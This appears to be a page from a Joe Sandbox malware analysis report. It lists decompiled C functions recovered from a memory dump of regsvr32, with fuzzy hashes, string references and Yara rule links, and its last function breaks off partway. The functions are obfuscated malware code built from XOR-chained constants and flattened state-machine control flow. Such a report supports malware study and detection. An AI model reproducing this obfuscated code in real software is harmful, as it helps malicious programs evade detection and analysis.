Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: G)-$Z($S
API String ID: 1725840886-4069833412
Opcode ID: 7d356adee45f442563143dc508da1001f27d59e1fee606c4e7ecf6adf8b4bf1d
Instruction ID: 3d5eda3af07602d33c3ead9fe272fa531b981480384a07a05fd5dc2030df659e
Opcode Fuzzy Hash: 7d356adee45f442563143dc508da1001f27d59e1fee606c4e7ecf6adf8b4bf1d
Instruction Fuzzy Hash: 978132726083028FC709CE25E58651BBBE5FBD0B44F10891EF4A59A261D7B4DA4E8F93

Uniqueness

Uniqueness Score: -1.00%

Function 003CE4E2 Relevance: 3.9, Strings: 3, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003CE4E2(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v540;
				void* _t188;
				void* _t191;
				void* _t197;
				signed int _t213;
				intOrPtr _t215;
				signed int _t219;
				signed int _t221;
				signed int _t244;

				_v20 = 0xf1f2;
				_v16 = 0x91e6c;
				_v16 = 0x41b5f2;
				_v16 = _v16 ^ 0x3e50cfc9;
				_v16 = _v16 ^ 0xf573013b;
				_v16 = _v16 ^ 0xcb6b0dbf;
				_v12 = 0xa74529;
				_v12 = _v12 * 0x46;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0x5556;
				_v12 = _v12 ^ 0x000e9ee7;
				_v8 = 0xfd9e05;
				_v8 = _v8 ^ 0x2da2e1a9;
				_v8 = _v8 + 0xe342;
				_v8 = _v8 ^ 0x2d690e59;
				_t215 =  *0x3e2208; // 0x28e510
				_t29 = _t215 + 0x22c; // 0x6e004f
				_t188 = E003D7C07(_t29, _v16, _v12, _v8);
				_v16 = 0x3921cf;
				_v16 = _v16 | 0xd5e94a62;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf2df5e18;
				_v8 = 0xd5a79e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0x54dd;
				_v8 = _v8 | 0xf5594c5e;
				_v8 = _v8 ^ 0xf55a4956;
				_v12 = 0x2d0d98;
				_v12 = _v12 | 0x9a3a3620;
				_t244 = 0x56;
				_v12 = _v12 / _t244;
				_t243 = _a4 + 0x2c;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x00709c75;
				_t191 = E003DBF03(_v16, _v8, _a4 + 0x2c, _v12, _t188);
				_t251 = _t191;
				if(_t191 != 0) {
					_v12 = 0x936b13;
					_v12 = _v12 ^ 0x7e2c6fc6;
					_v12 = _v12 ^ 0x7eb34ccf;
					_v8 = 0x6c0e91;
					_v8 = _v8 + 0xfffff485;
					_v8 = _v8 >> 6;
					_t219 = 0x35;
					_v8 = _v8 / _t219;
					_v8 = _v8 ^ 0x0003033c;
					_a4 = 0xa50d60;
					_a4 = _a4 + 0x5d33;
					_a4 = _a4 << 1;
					_a4 = _a4 >> 0xd;
					_a4 = _a4 ^ 0x00032ab5;
					_v16 = 0xa46a76;
					_v16 = _v16 * 0x7a;
					_v16 = _v16 ^ 0x4e51a6ad;
					_t197 = E003CD933(_v12, _v8, 0x3c1000, _a4, _v16);
					_v12 = 0x2706a8;
					_v12 = _v12 >> 1;
					_v12 = _v12 ^ 0x001b2a17;
					_v16 = 0x15451b;
					_t221 = 0x50;
					_v16 = _v16 / _t221;
					_t213 = 0xf;
					_v16 = _v16 / _t213;
					_v16 = _v16 ^ 0x00057f4a;
					_v8 = 0x5c70df;
					_v8 = _v8 * 0x30;
					_v8 = _v8 ^ 0x115868b0;
					_a4 = 0x3fbc7d;
					_a4 = _a4 >> 0xf;
					_a4 = _a4 | 0xd62aefd6;
					_a4 = _a4 >> 3;
					_a4 = _a4 ^ 0x1ac6971b;
					E003D0E90( *((intOrPtr*)(_a8 + 0xc)), _t251, _t221, _v16, _v8, _t243,  &_v540, _a4, _t197);
					_a4 = 0x76dec0;
					_a4 = _a4 + 0xffffc75d;
					_a4 = _a4 * 0x12;
					_a4 = _a4 ^ 0x0729cef3;
					_a4 = _a4 ^ 0x0f7c3581;
					_v16 = 0x49d961;
					_v16 = _v16 << 0xe;
					_v16 = _v16 / _t213;
					_v16 = _v16 ^ 0x07eb0008;
					_a8 = 0xef0718;
					_a8 = _a8 ^ 0xaa0e0978;
					_a8 = _a8 ^ 0xd854b057;
					_a8 = _a8 ^ 0x72b6d58c;
					E003C43D3(_a4, _v16, _a8, _t197);
					_a4 = 0x7624fa;
					_a4 = _a4 * 0x70;
					_a4 = _a4 >> 2;
					_a4 = _a4 ^ 0xc1d28061;
					_a4 = _a4 ^ 0xcd3bf8bd;
					_a8 = 0x6caee4;
					_a8 = _a8 + 0xffff72b2;
					_a8 = _a8 ^ 0x006b86e9;
					E003DEE45(_a4, _a8,  &_v540);
				}
				return 1;
			}

0x003ce4eb
0x003ce4f2
0x003ce4f9
0x003ce500
0x003ce507
0x003ce50e
0x003ce515
0x003ce522
0x003ce525
0x003ce529
0x003ce530
0x003ce537
0x003ce53e
0x003ce545
0x003ce54c
0x003ce559
0x003ce562
0x003ce568
0x003ce56d
0x003ce576
0x003ce57f
0x003ce583
0x003ce58a
0x003ce591
0x003ce595
0x003ce59c
0x003ce5a3
0x003ce5aa
0x003ce5b1
0x003ce5bd
0x003ce5c3
0x003ce5c6
0x003ce5c9
0x003ce5cd
0x003ce5df
0x003ce5e7
0x003ce5e9
0x003ce5ef
0x003ce5f8
0x003ce5ff
0x003ce606
0x003ce60d
0x003ce614
0x003ce61e
0x003ce621
0x003ce624
0x003ce62b
0x003ce632
0x003ce639
0x003ce63c
0x003ce640
0x003ce647
0x003ce652
0x003ce655
0x003ce66d
0x003ce672
0x003ce67c
0x003ce681
0x003ce68a
0x003ce696
0x003ce69b
0x003ce6a3
0x003ce6a9
0x003ce6ac
0x003ce6b3
0x003ce6bf
0x003ce6c8
0x003ce6cf
0x003ce6d6
0x003ce6da
0x003ce6e1
0x003ce6e5
0x003ce6fe
0x003ce703
0x003ce70c
0x003ce717
0x003ce71a
0x003ce721
0x003ce728
0x003ce72f
0x003ce738
0x003ce73b
0x003ce742
0x003ce749
0x003ce750
0x003ce757
0x003ce768
0x003ce76d
0x003ce778
0x003ce781
0x003ce785
0x003ce78c
0x003ce793
0x003ce79a
0x003ce7a1
0x003ce7af
0x003ce7b7
0x003ce7c0

Strings

B, xrefs: 003CE545
VU, xrefs: 003CE529
3], xrefs: 003CE632

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3]$B$VU
API String ID: 4033686569-532868816
Opcode ID: 1e0878d632e40b429a04d8ff0a60d1192a386d0a06f424cb6ad8186da6a6bc9c
Instruction ID: c2f8953f46ce13b6f53cb884220eee8db3cbc73f95cc3baa308a1ec8cca4fd20
Opcode Fuzzy Hash: 1e0878d632e40b429a04d8ff0a60d1192a386d0a06f424cb6ad8186da6a6bc9c
Instruction Fuzzy Hash: AC91D0B5D0020CFBCB59CFA1C58A8CEBFB5EB54354F20C099E819AA254D7749B95DF80

Uniqueness

Uniqueness Score: -1.00%

Function 003C89F6 Relevance: 3.9, Strings: 3, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003C89F6(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* __ecx;
				void* _t146;
				void* _t148;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				void* _t192;
				void* _t194;
				signed int* _t196;

				_t168 = _a4;
				_push(_a8);
				_t194 = __edx;
				_push(_a4);
				_push(__edx);
				E003C2528(_t146);
				_t193 = _v16;
				_t196 =  &(( &_v48)[4]);
				_v12 = 0x4b10b;
				_t192 = 0;
				_v8 = 0x61ff0;
				_t148 = 0x9bdf6;
				_v4 = 0x1e223;
				do {
					while(_t148 != 0x4a7df) {
						if(_t148 == 0x5a3d8) {
							_v36 = 0xd768c1;
							_t172 = 0x39;
							_v36 = _v36 / _t172;
							_v36 = _v36 >> 0xa;
							_v36 = _v36 ^ 0x000c1f1e;
							_v32 = 0x1f796f;
							_t173 = 0x61;
							_v32 = _v32 * 0x23;
							_v32 = _v32 / _t173;
							_v32 = _v32 ^ 0x0004a582;
							E003D4FB8(_t193, _v36, _v32);
						} else {
							if(_t148 == 0x789ca) {
								_v40 = 0xffd44;
								_t176 = 0x18;
								_v40 = _v40 * 0x14;
								_v40 = _v40 + 0x73db;
								_v40 = _v40 + 0xffffa2f1;
								_v40 = _v40 ^ 0x013fe01e;
								_v28 = 0x521781;
								_v28 = _v28 / _t176;
								_v28 = _v28 ^ 0x00036bb5;
								_v16 = 0x9c0558;
								_v16 = _v16 ^ 0xfd60d0ba;
								_v16 = _v16 ^ 0xbdfcd5e2;
								_v36 = 0xdfa129;
								_v36 = _v36 * 0x13;
								_v36 = _v36 * 0x45;
								_v36 = _v36 + 0xa552;
								_v36 = _v36 ^ 0x7937733e;
								_v44 = 0xeff75b;
								_v44 = _v44 + 0x7360;
								_v44 = _v44 + 0x94ef;
								_v44 = _v44 + 0xffff8d9f;
								_v44 = _v44 ^ 0x00f64233;
								_v20 = 0x290b;
								_v20 = _v20 >> 6;
								_v20 = _v20 ^ 0x000e6c51;
								_v24 = 0xcb4316;
								_v24 = _v24 << 5;
								_v24 = _v24 ^ 0x19693b4a;
								_v48 = 0x64b561;
								_v48 = _v48 + 0xfffff149;
								_v48 = _v48 ^ 0xcae3366d;
								_v48 = _v48 | 0xd1d5288c;
								_v48 = _v48 ^ 0xdbd2849f;
								_v32 = 0x9ef64d;
								_v32 = _v32 << 0xf;
								_v32 = _v32 >> 1;
								_v32 = _v32 ^ 0x3d93c6c5;
								_t167 = E003C9A53(_v16, _v36, _t194, _v40, _v44, 0, _v20, _t176, _v24, _v28, _t176, _v48, _v32);
								_t193 = _t167;
								_t196 =  &(_t196[0xb]);
								if(_t167 != 0xffffffff) {
									_t148 = 0x4a7df;
									continue;
								}
							} else {
								if(_t148 != 0x9bdf6) {
									goto L9;
								} else {
									_t148 = 0x789ca;
									continue;
								}
							}
						}
						L12:
						return _t192;
					}
					_v20 = 0x5cc53f;
					_v20 = _v20 >> 0xa;
					_v20 = _v20 ^ 0x000c0681;
					_v36 = 0x97a071;
					_t170 = 0x44;
					_v36 = _v36 / _t170;
					_v36 = _v36 ^ 0x220e5a88;
					_v36 = _v36 >> 5;
					_v36 = _v36 ^ 0x011d9e43;
					_v16 = 0xd2040;
					_v16 = _v16 >> 0xc;
					_v16 = _v16 ^ 0x000683e3;
					_v32 = 0x99c56c;
					_t171 = 0x61;
					_v32 = _v32 / _t171;
					_v32 = _v32 | 0x9485f5ae;
					_v32 = _v32 ^ 0x948298c6;
					_t192 = E003C3E82(_v20, _t168 + 4, _v36,  *_t168, _v16,  *((intOrPtr*)(_t168 + 4)), _t193, _v32);
					_t196 =  &(_t196[7]);
					_t148 = 0x5a3d8;
					L9:
				} while (_t148 != 0x98123);
				goto L12;
			}

0x003c89fa
0x003c8a01
0x003c8a05
0x003c8a07
0x003c8a08
0x003c8a0a
0x003c8a0f
0x003c8a13
0x003c8a16
0x003c8a1e
0x003c8a20
0x003c8a28
0x003c8a2d
0x003c8a35
0x003c8a35
0x003c8a45
0x003c8c79
0x003c8c89
0x003c8c8e
0x003c8c94
0x003c8c99
0x003c8ca1
0x003c8cae
0x003c8caf
0x003c8cbb
0x003c8cbf
0x003c8ccf
0x003c8a4b
0x003c8a50
0x003c8a64
0x003c8a75
0x003c8a76
0x003c8a7a
0x003c8a82
0x003c8a8a
0x003c8a92
0x003c8aa0
0x003c8aa4
0x003c8aac
0x003c8ab4
0x003c8abc
0x003c8ac4
0x003c8ad1
0x003c8ada
0x003c8ade
0x003c8ae6
0x003c8aee
0x003c8af6
0x003c8afe
0x003c8b06
0x003c8b0e
0x003c8b16
0x003c8b1e
0x003c8b23
0x003c8b2b
0x003c8b33
0x003c8b38
0x003c8b40
0x003c8b48
0x003c8b50
0x003c8b58
0x003c8b60
0x003c8b68
0x003c8b70
0x003c8b75
0x003c8b79
0x003c8baa
0x003c8baf
0x003c8bb1
0x003c8bb7
0x003c8bbd
0x00000000
0x003c8bbd
0x003c8a52
0x003c8a57
0x00000000
0x003c8a5d
0x003c8a5d
0x00000000
0x003c8a5d
0x003c8a57
0x003c8a50
0x003c8cd5
0x003c8cde
0x003c8cde
0x003c8bc7
0x003c8bd1
0x003c8bd6
0x003c8bde
0x003c8bec
0x003c8bf1
0x003c8bf7
0x003c8bff
0x003c8c04
0x003c8c0c
0x003c8c14
0x003c8c19
0x003c8c21
0x003c8c2d
0x003c8c30
0x003c8c37
0x003c8c3f
0x003c8c62
0x003c8c64
0x003c8c67
0x003c8c6c
0x003c8c6c
0x00000000

Strings

>s7y, xrefs: 003C8AE6
`s, xrefs: 003C8AF6
@ , xrefs: 003C8C0C

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >s7y$@ $`s
API String ID: 0-1629392362
Opcode ID: ee0978d5c6bb22d22035f226e1e696247f48605dbd6e729b517c4432a00d63ec
Instruction ID: f9a14c933ae0da3f892c051758d506f90b1345ebb54055e775b044638c5181e1
Opcode Fuzzy Hash: ee0978d5c6bb22d22035f226e1e696247f48605dbd6e729b517c4432a00d63ec
Instruction Fuzzy Hash: 7F7132715083419FC359DF25C44991BBBE1FBC8718F008A1DF5C9AA260C7B9DA098F8B

Uniqueness

Uniqueness Score: -1.00%

Function 003D46DD Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003D46DD(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ecx;
				void* _t100;
				void* _t102;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t133;
				signed int _t137;
				void* _t146;
				intOrPtr _t154;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003C2528(_t100);
				_v12 = 0x402cf;
				_t154 = 0;
				_v8 = 0x1bcb0;
				_v4 = 0;
				_t102 = 0x5f695;
				do {
					while(_t102 != 0x3f8ae) {
						if(_t102 == 0x5f695) {
							_v28 = 0x42847d;
							_v28 = _v28 | 0xbb205562;
							_t128 = 0x19;
							_v28 = _v28 / _t128;
							_t129 = 9;
							_v28 = _v28 / _t129;
							_v28 = _v28 ^ 0x00d55ebe;
							_v20 = 0xb75217;
							_v20 = _v20 >> 0xe;
							_v20 = _v20 ^ 0x00045013;
							_v24 = 0x85d312;
							_t130 = 0x29;
							_push(_t130);
							_push(_t130);
							_v24 = _v24 * 0x19;
							_v24 = _v24 + 0xae4a;
							_t146 = 0x34;
							_v24 = _v24 / _t130;
							_v24 = _v24 ^ 0x005a563b;
							 *0x3e2210 = E003C8D52(_t130, _t146, __eflags);
							_t102 = 0x3f8ae;
							continue;
						} else {
							if(_t102 == 0xb1b0c) {
								_v24 = 0x97a839;
								_t133 = 0x5a;
								_v24 = _v24 / _t133;
								_v24 = _v24 * 0x2d;
								_v24 = _v24 + 0xffffaeaf;
								_v24 = _v24 ^ 0x004d4831;
								_v28 = 0x9e859;
								_v28 = _v28 | 0xab7edb6e;
								_v28 = _v28 >> 7;
								_v28 = _v28 ^ 0x015d4d2b;
								_t154 = E003D97B2(_a8, _a4, _v24, _v28);
								__eflags = _t154;
								if(__eflags == 0) {
									_t102 = 0xbc5ca;
									continue;
								}
							} else {
								if(_t102 == 0xbc5ca) {
									E003C772A();
									_t102 = 0xcbea3;
									continue;
								} else {
									if(_t102 != 0xcbea3) {
										goto L15;
									} else {
										_v16 = 0xea6ff7;
										_t137 = 0x31;
										_v16 = _v16 / _t137;
										_v16 = _v16 ^ 0x00061d63;
										_v20 = 0xc7ceba;
										_v20 = _v20 * 0xe;
										_v20 = _v20 ^ 0x0ae817a0;
										_v24 = 0x17844c;
										_v24 = _v24 >> 3;
										_v24 = _v24 + 0xffff4ba5;
										_v24 = _v24 * 0x65;
										_v24 = _v24 ^ 0x00e10c67;
										_v28 = 0xa9413f;
										_v28 = _v28 | 0xebffbbff;
										_v28 = _v28 ^ 0xebfd5344;
										E003C79D0(_v16, _v20, _v28, _v24,  *0x3e2210, _v28);
									}
								}
							}
						}
						L7:
						return _t154;
					}
					__eflags = E003DC064();
					if(__eflags == 0) {
						_t102 = 0x78adb;
						goto L15;
					} else {
						_t102 = 0xb1b0c;
						continue;
					}
					goto L7;
					L15:
					__eflags = _t102 - 0x78adb;
				} while (__eflags != 0);
				goto L7;
			}

0x003d46e4
0x003d46e8
0x003d46ec
0x003d46ee
0x003d46f6
0x003d46fe
0x003d4700
0x003d4708
0x003d470c
0x003d4720
0x003d4720
0x003d4730
0x003d4869
0x003d4873
0x003d4881
0x003d4886
0x003d4890
0x003d4895
0x003d489b
0x003d48a3
0x003d48ab
0x003d48b0
0x003d48b8
0x003d48c5
0x003d48c6
0x003d48c7
0x003d48ca
0x003d48ce
0x003d48dc
0x003d48dd
0x003d48e1
0x003d48fb
0x003d4900
0x00000000
0x003d4736
0x003d4738
0x003d47f8
0x003d4808
0x003d480f
0x003d481c
0x003d4820
0x003d4828
0x003d4830
0x003d4838
0x003d4840
0x003d4845
0x003d485a
0x003d485e
0x003d4860
0x003d4862
0x00000000
0x003d4862
0x003d473e
0x003d4740
0x003d47ec
0x003d47f1
0x00000000
0x003d4746
0x003d4748
0x00000000
0x003d474e
0x003d474e
0x003d475e
0x003d4761
0x003d4765
0x003d476d
0x003d477a
0x003d477e
0x003d4786
0x003d478e
0x003d4793
0x003d47a0
0x003d47a4
0x003d47ac
0x003d47b4
0x003d47bc
0x003d47da
0x003d47df
0x003d4748
0x003d4740
0x003d4738
0x003d47e3
0x003d47eb
0x003d47eb
0x003d4910
0x003d4912
0x003d491b
0x00000000
0x003d4914
0x003d4914
0x00000000
0x003d4914
0x00000000
0x003d4920
0x003d4920
0x003d4920
0x00000000

Strings

;VZ, xrefs: 003D48E1
Y, xrefs: 003D4830
1HM, xrefs: 003D4828

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1HM$;VZ$Y
API String ID: 0-3246472283
Opcode ID: 407c22b957bf6c8f640db6a4d5572839206de7c01518661fb643277240597070
Instruction ID: 72cd6cdd2427f41fd0e1ae6ba5abfbcd962019bf50598fa2e7960b63f9f98a0c
Opcode Fuzzy Hash: 407c22b957bf6c8f640db6a4d5572839206de7c01518661fb643277240597070
Instruction Fuzzy Hash: 485178726093428FC315CF25E58A91BBBE1FBC4744F108D2EF5949A260D7B4CA098B93

Uniqueness

Uniqueness Score: -1.00%

Function 003C5717 Relevance: 3.9, Strings: 3, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C5717(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t110;
				void* _t112;
				signed int _t121;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t136;
				void* _t153;
				signed int* _t156;

				_t152 = _a12;
				_t129 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t110);
				_v68 = 0x7d13b;
				_t156 =  &(( &_v84)[5]);
				_v64 = 0x96aa0;
				_t112 = 0xe11e4;
				_v60 = 0x99b10;
				_t153 = 0;
				_v56 = 0x812;
				do {
					while(_t112 != 0x5c000) {
						if(_t112 == 0xb1fac) {
							_v80 = 0xdaca36;
							_t133 = 0x22;
							_v80 = _v80 / _t133;
							_v80 = _v80 ^ 0x00087906;
							_v76 = 0x31ae20;
							_v76 = _v76 >> 7;
							_v76 = _v76 * 0x73;
							_v76 = _v76 ^ 0x002d3f46;
							_v72 = 0xea3d54;
							_v72 = _v72 | 0x362425e2;
							_v72 = _v72 ^ 0x36e244f9;
							_t121 = E003CD706(_v80, _v76, _v72,  &_v52, _t152);
							_t156 =  &(_t156[3]);
							__eflags = _t121;
							if(__eflags != 0) {
								_t112 = 0xde39f;
								continue;
							}
						} else {
							if(_t112 == 0xde39f) {
								_v76 = 0x7e52bd;
								_v76 = _v76 | 0xd7f4cdba;
								_v76 = _v76 ^ 0xb6311cc6;
								_v76 = _v76 ^ 0x61cc7232;
								_v72 = 0x2cbec8;
								_t135 = 0x1e;
								_v72 = _v72 / _t135;
								_v72 = _v72 >> 7;
								_v72 = _v72 ^ 0x000f0a16;
								_v80 = 0x920620;
								_v80 = _v80 ^ 0x6749c3a7;
								_v80 = _v80 >> 0x10;
								_v80 = _v80 ^ 0x4ad47f98;
								_v80 = _v80 ^ 0x4adf44f8;
								_v84 = 0xde4619;
								_v84 = _v84 + 0x5376;
								_t136 = 0x1c;
								_v84 = _v84 / _t136;
								_v84 = _v84 ^ 0x5c32609e;
								_v84 = _v84 ^ 0x5c3e1525;
								__eflags = E003D833B(_v76, _v72, __eflags, _v80, _v84,  &_v52, _t152 + 8);
								_t153 =  !=  ? 1 : _t153;
							} else {
								if(_t112 != 0xe11e4) {
									goto L9;
								} else {
									_t112 = 0x5c000;
									continue;
								}
							}
						}
						L12:
						return _t153;
					}
					_v76 = 0x76f08c;
					_v76 = _v76 + 0xffff6708;
					_v76 = _v76 >> 0xd;
					_v76 = _v76 ^ 0x000d1c1b;
					_v84 = 0xc04ba2;
					_v84 = _v84 >> 2;
					_v84 = _v84 ^ 0x0035cd81;
					_v80 = 0x7b0727;
					_t131 = 0x65;
					_v80 = _v80 / _t131;
					_v80 = _v80 ^ 0x00051a02;
					_v72 = 0x1f4941;
					_v72 = _v72 + 0x9985;
					_t58 =  &_v72;
					 *_t58 = _v72 ^ 0x00190103;
					__eflags =  *_t58;
					E003CAE19( &_v52, _v76, _t129, _v84, _v80, _v72);
					_t156 =  &(_t156[4]);
					_t112 = 0xb1fac;
					L9:
					__eflags = _t112 - 0x3ded8;
				} while (__eflags != 0);
				goto L12;
			}

0x003c571e
0x003c5722
0x003c5724
0x003c5725
0x003c5729
0x003c572d
0x003c572e
0x003c572f
0x003c5734
0x003c573c
0x003c573f
0x003c5747
0x003c574c
0x003c5754
0x003c5756
0x003c5763
0x003c5763
0x003c5770
0x003c578c
0x003c579c
0x003c57a0
0x003c57a4
0x003c57ac
0x003c57b4
0x003c57be
0x003c57c6
0x003c57ce
0x003c57d6
0x003c57de
0x003c57f3
0x003c57f8
0x003c57fb
0x003c57fd
0x003c5803
0x00000000
0x003c5803
0x003c5772
0x003c5777
0x003c58a8
0x003c58b2
0x003c58ba
0x003c58c2
0x003c58ca
0x003c58d8
0x003c58dd
0x003c58e3
0x003c58e8
0x003c58f0
0x003c58f8
0x003c5900
0x003c5905
0x003c590d
0x003c5915
0x003c591d
0x003c5929
0x003c592c
0x003c5933
0x003c593b
0x003c5964
0x003c5966
0x003c577d
0x003c5782
0x00000000
0x003c5788
0x003c5788
0x00000000
0x003c5788
0x003c5782
0x003c5777
0x003c596a
0x003c5972
0x003c5972
0x003c580d
0x003c5817
0x003c581f
0x003c5824
0x003c582c
0x003c5834
0x003c5839
0x003c5841
0x003c584f
0x003c5856
0x003c585a
0x003c5862
0x003c586a
0x003c5872
0x003c5872
0x003c5872
0x003c588b
0x003c5890
0x003c5893
0x003c5898
0x003c5898
0x003c5898
0x00000000

Strings

vS, xrefs: 003C591D
F?-, xrefs: 003C57C6
%$6, xrefs: 003C57D6

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F?-$vS$%$6
API String ID: 0-2259993583
Opcode ID: 91455e12494e8b4a8ba2c7e87531aeee8ba4be59ac6d7b2f6d328e9a91869bfc
Instruction ID: bd5ac9181ffb78f9f7526082ac81bcd47bc9fd742bdeaf5a97445e2fe32c9adf
Opcode Fuzzy Hash: 91455e12494e8b4a8ba2c7e87531aeee8ba4be59ac6d7b2f6d328e9a91869bfc
Instruction Fuzzy Hash: 0F5153B26083429FC309CF21C98A95BBBE5FBD8748F10491EF58596221D7B4DA49CF93

Uniqueness

Uniqueness Score: -1.00%

Function 003CC14C Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003CC14C() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				void* _t91;
				signed int _t110;
				signed int _t111;
				signed int _t119;
				intOrPtr _t129;
				signed int* _t131;

				_t131 =  &_v348;
				_t129 = 0;
				_v332 = 0x3da29;
				_v328 = 0;
				_t91 = 0xf940f;
				_v324 = 0;
				do {
					while(_t91 != 0x114d8) {
						if(_t91 == 0x21634) {
							_v340 = 0xcf9dc5;
							_v340 = _v340 + 0xffff27cd;
							_v340 = _v340 ^ 0x00cec67a;
							_t129 = _t129 + _v340 * _v280;
							_t91 = 0xe76ea;
							continue;
						} else {
							if(_t91 == 0x2fee0) {
								_t129 = _t129 + (_v320 & 0x0000ffff);
							} else {
								if(_t91 == 0x861f8) {
									_v284 = 0x11c;
									_v340 = 0x180057;
									_v340 = _v340 + 0x1fda;
									_v340 = _v340 ^ 0x001381ca;
									_v336 = 0xc9d692;
									_v336 = _v336 + 0x337b;
									_v336 = _v336 ^ 0x00cf94c6;
									_v344 = 0x698d3b;
									_v344 = _v344 + 0xffff3bc7;
									_v344 = _v344 ^ 0x006fa8af;
									_v348 = 0x70c8e4;
									_v348 = _v348 | 0x1ffb76fd;
									_v348 = _v348 >> 0xb;
									_v348 = _v348 ^ 0x0007cd11;
									E003D79C8(_v340, _v336,  &_v284, _v344, _v348);
									_t131 =  &(_t131[3]);
									_t91 = 0x114d8;
									continue;
								} else {
									if(_t91 == 0xdddcf) {
										_v344 = 0x9f0c99;
										_v344 = _v344 * 0x23;
										_v344 = _v344 ^ 0x15bf3e4b;
										_t91 = 0x21634;
										_t129 = _t129 + _v344 * (_v2 & 0x000000ff);
										continue;
									} else {
										if(_t91 == 0xe76ea) {
											_v348 = 0x5b934e;
											_t119 = 0x5e;
											_v348 = _v348 / _t119;
											_v348 = _v348 + 0xffff3e88;
											_v348 = _v348 ^ 0x00003789;
											_t129 = _t129 + _v348 * _v276;
											_t91 = 0x2fee0;
											continue;
										} else {
											if(_t91 != 0xf940f) {
												goto L14;
											} else {
												_t91 = 0x861f8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t129;
					}
					_v344 = 0xd73e0d;
					_t110 = 0x67;
					_v344 = _v344 * 0x44;
					_v344 = _v344 + 0xffffbc6c;
					_v344 = _v344 ^ 0x3924adc1;
					_v348 = 0xe95155;
					_t67 =  &_v348; // 0xe95155
					_t111 = 0x6a;
					_v348 =  *_t67 / _t110;
					_v348 = _v348 | 0x1b085c58;
					_v348 = _v348 ^ 0x1b0ce0c7;
					_v340 = 0x5bdbe2;
					_v340 = _v340 / _t111;
					_v340 = _v340 ^ 0x0005a8b6;
					_t88 =  &_v348; // 0xe95155
					E003C7293(_v344,  &_v320,  *_t88, _v340);
					_t91 = 0xdddcf;
					L14:
				} while (_t91 != 0xb3f09);
				goto L17;
			}

0x003cc14c
0x003cc155
0x003cc157
0x003cc160
0x003cc164
0x003cc169
0x003cc17c
0x003cc17c
0x003cc189
0x003cc2ba
0x003cc2c2
0x003cc2ca
0x003cc2db
0x003cc2dd
0x00000000
0x003cc18f
